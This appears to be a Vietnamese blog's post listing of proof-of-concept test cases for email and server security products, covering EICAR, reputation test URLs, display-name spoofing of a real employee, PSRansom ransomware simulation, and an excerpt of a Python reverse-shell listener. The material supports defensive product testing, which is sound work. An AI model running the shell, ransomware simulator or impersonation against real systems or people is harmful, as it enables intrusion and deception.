Test Case Exchange Online: Password Guessing
B1: Chọn Global Settings > Attachment Password Guessing > Add B2: Tạo Rule > Save B3: gửi email thử nghiệm B4: Kiểm tra mail nhận B5: Kiểm tra phát hiện
Continue ReadingAuthor: syvtit
Test Case Exchange Online: Malware
B1: phần test này chúng ta sẽ dùng eicar để test thử, gửi email có chứa file đính kèm là eicar hoặc có chứa string liên quan đến eicar như trong email này B2: Kiểm tra nhận email B3: Kiểm tra log
Continue ReadingTest Case Exchange Online: QR Code
B1: trong bài test này mình sẽ sử dụng file “qrcode.pdf” có chứa mã QR code liên kết đến hxxp://wrs41.winshipway.com B2: Cấu hình policy với Virtual Analyzer B3: gửi email với file đính kèm là “qrcode.pdf” B4: Kiểm tra nhận email B5: Kiểm tra log Kiểm tra file report B6: Search trên Vision One
Continue ReadingTest Case Exchange Online: Suspicious Sender
B1: Cấu hình gmail để thay đổi tên hiện thị khi gửi email. Tham khảo tại link này: https://support.google.com/mail/answer/8158?hl=en. Ở đây mình sẽ chỉnh sửa thành thông tin của 1 người nào đó tồn tại trong tổ chức khách hàng đang PoC. B2: Cấu hình High Profile Users cho 1 user để thực hiện kiểm […]
Continue ReadingTest Case Exchange Online: Web Reputation
B1: gửi email có đính kèm link có risk về web như sau Security Levels Test URLs Dangerous http(s)://wrs49.winshipway.com/ Highly Suspicious http(s)://wrs65.winshipway.com/ Suspicious http(s)://wrs70.winshipway.com/ Unrated http(s)://wrs71.winshipway.com/ Normal http(s)://wrs81.winshipway.com/ Fraud http(s)://75-1.winshipway.com Callback http(s)://91-1.winshipway.com B2: Kiểm tra mailbox người nhận thấy đã nhận được email B3: Kiểm tra phát hiện trên Cloud Email and Collaboration Protection B4: […]
Continue Reading3. Cấu hình policy Exchange Online
B1: Sau khi cấu hình tích hợp thành công sẽ có một policy mặc định B2: Trong phần này mình sẽ kiểm tra và cấu hình policy “Default Exchange Online Policy ATP (Monitor Only) General Advanced Spam Protection Malware Scanning File Blocking Mặc định phần này sẽ tắt, trong quá trình PoC không để ảnh […]
Continue Reading2. Cài đặt Email Sensor
B1: Truy cập vào Vision One > Chọn Email and Collaboration Sensor > Click Here B2: Cấp quyền cho phép truy cập > Accept B3: Chọn Continue B4: Chọn Manage Sensor Detection B5: Bật sensor cho mailbox bạn mong muốn > Save B6: Chọn Confirm B7: Kết quả
Continue Reading1. Tích hợp
B1: Truy cập vào giao diện quản trị Vision One > chọn Cloud Email and Collaboration Protection > Dashboard B2: Đợi 1 lúc sẽ tạo xong và hiện ra giao diện quản trị B3: Chọn Administration > Service Account > Add > Default organization > Exchange Online B4: Chọn Synchronize all users and groups > […]
Continue ReadingTcp Connection và tùy chỉnh giả lập
1. Viết Tcp Connection đơn giản với Python tcpServer.py tcpClient import socketdef connect(): s = socket.socket() s.bind((“0.0.0.0”,12345)) s.listen(1) conn , addr = s.accept() print(‘[+] We got a connection from’, addr) while True: command = input(“Shell> “) if ‘terminate’ in command: conn.send(‘terminate’.encode()) conn.close() break else: try: conn.send(command.encode()) print(conn.recv(4096).decode()) except ValueError as ve: print(ve)connect() import socketimport subprocess def […]
Continue ReadingTest case: Server & Workload Protection/Deep Security – Fileless – PSRansom
Thực hiện với tool PSRansom ở phần Giả Lập Tình Huống Tấn Công cho phần kiểm thử này B1: Cấu hình exclusion cho file thực thi PSRansom khỏi real-time scan B2: Chạy thực thi powershell với file PSRansom.ps1, lúc này Deep Security sẽ phát hiện fileless và ngăn chặn việc thực thi
Continue Reading